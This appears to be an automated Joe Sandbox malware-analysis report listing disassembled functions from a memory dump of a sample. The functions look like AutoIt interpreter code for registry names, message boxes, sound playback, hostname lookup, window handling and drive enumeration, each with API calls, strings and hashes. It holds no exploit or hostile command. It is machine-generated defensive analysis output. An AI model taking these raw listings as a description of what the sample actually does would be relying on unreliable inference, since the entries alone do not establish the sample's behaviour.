Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: c2a0f8a6bc869f2d6b864d6c98dd0c4eeac4d0a4f2a6ba125a7125dee0e4f3a6
Instruction ID: 83bdcac60a83fb40f952cc4fd9a30f7c9356a3b382039fb7e21ff23fd705b47c
Opcode Fuzzy Hash: c2a0f8a6bc869f2d6b864d6c98dd0c4eeac4d0a4f2a6ba125a7125dee0e4f3a6
Instruction Fuzzy Hash: 5D412872C14229AECF11EBA4EC85DEEB7B8FF44305F405429E945B31A1DB30AD58CBA0

Function 00E80E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31

Strings

HKCU, xrefs: 00E80F21
HKCR, xrefs: 00E80ED9
HKEY_USERS, xrefs: 00E80F32
HKEY_CLASSES_ROOT, xrefs: 00E80EC4
HKLM, xrefs: 00E80EAF
HKU, xrefs: 00E80F43
HKEY_CURRENT_CONFIG, xrefs: 00E80EEE
HKEY_CURRENT_USER, xrefs: 00E80F10
HKEY_LOCAL_MACHINE, xrefs: 00E80E9A
HKCC, xrefs: 00E80EFF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 3e22b886ab536e193636bccb7a9e17e62a2032b150403193ce095986376df7d1
Instruction ID: 2bf584048564c11f029036c8e0266e2571f04824c453371aac11d75ef8276a42
Opcode Fuzzy Hash: 3e22b886ab536e193636bccb7a9e17e62a2032b150403193ce095986376df7d1
Instruction Fuzzy Hash: 6C414F7120025A8BCF60EF10E896AEF37A4BF51354F546464FD6D3B292DB309D5ACB60

Function 00E5F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E3E2A0,00000010,?,Bad directive syntax error,00E8F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E5F7C2
LoadStringW.USER32(00000000,?,00E3E2A0,00000010), ref: 00E5F7C9

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

_wprintf.LIBCMT ref: 00E5F7FC
__swprintf.LIBCMT ref: 00E5F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E5F88D

Strings

Line %d:, xrefs: 00E5F818
%s (%d) : ==> %s.: %s %s, xrefs: 00E5F7F7
Error: , xrefs: 00E5F85B
Line %d (File "%s"):, xrefs: 00E5F833
., xrefs: 00E5F873

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 5051942ad8d748c686e389f0668cf3d0db818da1429f27c5699a0498566f9ffd
Instruction ID: 03f73604bac8ca631709582b9d97e71ccc14fe251a9f61721a97db0712938010
Opcode Fuzzy Hash: 5051942ad8d748c686e389f0668cf3d0db818da1429f27c5699a0498566f9ffd
Instruction Fuzzy Hash: 7A215C3290021ABFCF15EF90CC4AEEE77B9BF18304F041865F555761A2EA31AA58DB51

Function 00E652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

Part of subcall function 00E07924: _memmove.LIBCMT ref: 00E079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E65330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E65346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E65357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E65369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E6537A

Strings

play PlayMe, xrefs: 00E65375
play PlayMe wait, xrefs: 00E65364
status PlayMe mode, xrefs: 00E6532B
close PlayMe, xrefs: 00E65341, 00E6536E
alias PlayMe, xrefs: 00E65309
open , xrefs: 00E652DF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c492a138dbe8979254d1a9e03e2e04647fc50bee66202486544bd4f267acc4fa
Instruction ID: 15d0f8b8aa4da109bebf411823846c1067c5eb92a692780fc8baf53dc114b0aa
Opcode Fuzzy Hash: c492a138dbe8979254d1a9e03e2e04647fc50bee66202486544bd4f267acc4fa
Instruction Fuzzy Hash: EC11E231E9022979D720B661DC4ADFFBBBCEBD1F88F40242AB441B21D4EEA01C44C6A0

Function 00E646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E646D2
gethostname.WSOCK32(?,00000100), ref: 00E646EC
gethostbyname.WSOCK32(?), ref: 00E646F9
_wcscpy.LIBCMT ref: 00E64721
_memmove.LIBCMT ref: 00E64734
inet_ntoa.WSOCK32(?), ref: 00E6473F
_strcat.LIBCMT ref: 00E6474D
_wcscpy.LIBCMT ref: 00E64764
WSACleanup.WSOCK32 ref: 00E64772
_wcscpy.LIBCMT ref: 00E64780

Strings

0.0.0.0, xrefs: 00E6471B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6b36b1f07dce17bc9a0ab0976cd692297ff6bea566fa2336a1ea7a2181a00ed4
Instruction ID: fc36cef5c50fa057dafec598445c08f288c5cf8e57cb4e25c066456ef9cf9920
Opcode Fuzzy Hash: 6b36b1f07dce17bc9a0ab0976cd692297ff6bea566fa2336a1ea7a2181a00ed4
Instruction Fuzzy Hash: 5F11D271500118AFDB24AB70BC4AEEA77BCEB02761F0411BAF54AB60D1EF719AC58B50

Function 00E64F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E64F7A

Part of subcall function 00E2049F: timeGetTime.WINMM(?,76AAB400,00E10E7B), ref: 00E204A3

Sleep.KERNEL32(0000000A), ref: 00E64FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00E64FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E64FEC
SetActiveWindow.USER32 ref: 00E6500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E65019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00E65038
Sleep.KERNEL32(000000FA), ref: 00E65043
IsWindow.USER32 ref: 00E6504F
EndDialog.USER32(00000000), ref: 00E65060

Strings

BUTTON, xrefs: 00E64FDE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 494bd53378bc9ac89b715dedc5a561acca11afc354a8c45330f8395fd98664db
Instruction ID: 54e9b07d24085a006b337a497e5df9310ff21dcc6b3ec5c7c8345c9a79baaa99
Opcode Fuzzy Hash: 494bd53378bc9ac89b715dedc5a561acca11afc354a8c45330f8395fd98664db
Instruction Fuzzy Hash: 04219F71380605AFE7105F32FC88E263BBAEF04789F243434F10AB11B1DB628D599B61

Function 00E6D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

CoInitialize.OLE32(00000000), ref: 00E6D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E6D67D
SHGetDesktopFolder.SHELL32(?), ref: 00E6D691
CoCreateInstance.OLE32(00E92D7C,00000000,00000001,00EB8C1C,?), ref: 00E6D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E6D74C
CoTaskMemFree.OLE32(?,?), ref: 00E6D7A4
_memset.LIBCMT ref: 00E6D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00E6D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E6D840
CoTaskMemFree.OLE32(00000000), ref: 00E6D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E6D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00E6D880

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 0865b465b12390f6535684e70ca1dfddd745b24a55ebaff42d83c64689b7b5bc
Instruction ID: 99ec9da7c3f4f04a260330732281758af17cae51c8ae5c7bf4d0fc7475413d2f
Opcode Fuzzy Hash: 0865b465b12390f6535684e70ca1dfddd745b24a55ebaff42d83c64689b7b5bc
Instruction Fuzzy Hash: E4B1FA75A00109AFDB04DFA4DC88DAEBBF9FF48314B1494A9E909EB261DB30ED45CB50

Function 00E5C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00E5C283
GetWindowRect.USER32(00000000,?), ref: 00E5C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E5C2F3
GetDlgItem.USER32(?,00000002), ref: 00E5C2FE
GetWindowRect.USER32(00000000,?), ref: 00E5C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E5C364
GetDlgItem.USER32(?,000003E9), ref: 00E5C372
GetWindowRect.USER32(00000000,?), ref: 00E5C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E5C3C6
GetDlgItem.USER32(?,000003EA), ref: 00E5C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E5C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00E5C3FE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
Instruction ID: abd8c250e595ef0103abace67ada889e08d6e1be89cd1f33f7740804e736f2c2
Opcode Fuzzy Hash: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
Instruction Fuzzy Hash: 61518471B00305AFDB08CFA9DD99A6DBBB5EF88311F24852DF919E7290D7709D448B50

Function 00E0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E020D3
KillTimer.USER32(-00000001,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E0216E
DestroyAcceleratorTable.USER32(00000000), ref: 00E3BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BD0A
DeleteObject.GDI32(00000000), ref: 00E3BD1C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e8be131b588f9ab8422d220ca53a57cfad7e1cf39fecff62815900fa5fe4ca9c
Instruction ID: 3fd61a0dfc964df5d069ff30dc995fd3d6758c4775dee871169619a84e9126fa
Opcode Fuzzy Hash: e8be131b588f9ab8422d220ca53a57cfad7e1cf39fecff62815900fa5fe4ca9c
Instruction Fuzzy Hash: F8616A32101B00DFDB299F15C94CB26BBF1FB4031AF50652DE646BA9A0C772A8D6DB90

Function 00E021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC

GetSysColor.USER32(0000000F), ref: 00E021D3

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e314c40249a19f861c89d71a02e61d98ef19a267e455a3278e661734371a07d8
Instruction ID: 2e1a6fd118e24f69a4cd38038107775d752c571a3cbd8daa456b4dd0bbba22c3
Opcode Fuzzy Hash: e314c40249a19f861c89d71a02e61d98ef19a267e455a3278e661734371a07d8
Instruction Fuzzy Hash: A441B031000140AFDB255FA9EC8CBB93BA5EB56325F145269FF65AA1F2C7318CC6DB21

Function 00E6A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00E8F910), ref: 00E6A90B
GetDriveTypeW.KERNEL32(00000061,00EB89A0,00000061), ref: 00E6A9D5
_wcscpy.LIBCMT ref: 00E6A9FF

Strings

unknown, xrefs: 00E6A996
network, xrefs: 00E6A969
ramdisk, xrefs: 00E6A97F
removable, xrefs: 00E6A93D
all, xrefs: 00E6A911
fixed, xrefs: 00E6A953
cdrom, xrefs: 00E6A927

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 718b028a524a9e250e9bf7d6e65e098d26a927f901cd439aa5ce0182e34c05f0
Instruction ID: e9b2c1b5f8fa08a3a4e374f4363d08845234b5c5343d11044593b73b12dd4957
Opcode Fuzzy Hash: 718b028a524a9e250e9bf7d6e65e098d26a927f901cd439aa5ce0182e34c05f0
Instruction Fuzzy Hash: 3A519A315483009BC710EF14E992AAFB7E5AFC4384F586829F49A772E2DB319949CB52

Function 00E09837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00E09862
__swprintf.LIBCMT ref: 00E098AC
__i64tow.LIBCMT ref: 00E3F5E6

Strings

False, xrefs: 00E3F5AE
True, xrefs: 00E3F5A7
%.15g, xrefs: 00E098A6
0x%p, xrefs: 00E3F5C8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 4629b974b74267b3dad40f8bcde9a77fb2be143bc28d4dd3441b6ba4978b1416
Instruction ID: 90cdddea63ff453148f4ff84b449dceb08940bd0b9da272059d8d205b3983b5a
Opcode Fuzzy Hash: 4629b974b74267b3dad40f8bcde9a77fb2be143bc28d4dd3441b6ba4978b1416
Instruction Fuzzy Hash: 4341A471904205AFDB28DF74E846AB677E8EF45304F20646EE54AF6293EA359D41CB20

Function 00E87152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E8716A
CreateMenu.USER32 ref: 00E87185
SetMenu.USER32(?,00000000), ref: 00E87194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87221
IsMenu.USER32(?), ref: 00E87237
CreatePopupMenu.USER32 ref: 00E87241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E8726E
DrawMenuBar.USER32 ref: 00E87276

Strings

0, xrefs: 00E87160
F, xrefs: 00E87262

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 42efd9cadb8efa6074da961891addad117f968ee380fec3ecb26d1acd6835e64
Instruction ID: 6e3b8ab459355312451d90d8b5f6ddfbf63192bef7aba0f32a9821f76ed6d4b7
Opcode Fuzzy Hash: 42efd9cadb8efa6074da961891addad117f968ee380fec3ecb26d1acd6835e64
Instruction Fuzzy Hash: FD4136B5A01205EFDB20EFA5D988E9ABBB5FF49310F240029F959B7361D731AD14CB90

Function 00E874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E8755E
CreateCompatibleDC.GDI32(00000000), ref: 00E87565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E87578
SelectObject.GDI32(00000000,00000000), ref: 00E87580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E8758B
DeleteDC.GDI32(00000000), ref: 00E87594
GetWindowLongW.USER32(?,000000EC), ref: 00E8759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E875BE

Strings

static, xrefs: 00E874F6

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 45063b85c19d4ff5c54cc66772cb455591d0cf9e7343768dd497f9633a4f238e
Instruction ID: 8f1767eb87a5818bd2c123783cd6a4b2a6d45dfacd53d227b6018d83bf7124ee
Opcode Fuzzy Hash: 45063b85c19d4ff5c54cc66772cb455591d0cf9e7343768dd497f9633a4f238e
Instruction Fuzzy Hash: 6C318A32104214AFDF11AFA5DC08FDA3BA9EF09325F201224FA5DB60A0C731D825DBA0

Function 00E26E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E26E3E

Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28

__gmtime64_s.LIBCMT ref: 00E26ED7
__gmtime64_s.LIBCMT ref: 00E26F0D
__gmtime64_s.LIBCMT ref: 00E26F2A
__allrem.LIBCMT ref: 00E26F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E26F9C
__allrem.LIBCMT ref: 00E26FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E26FD1
__allrem.LIBCMT ref: 00E26FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27006
__invoke_watson.LIBCMT ref: 00E27077

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
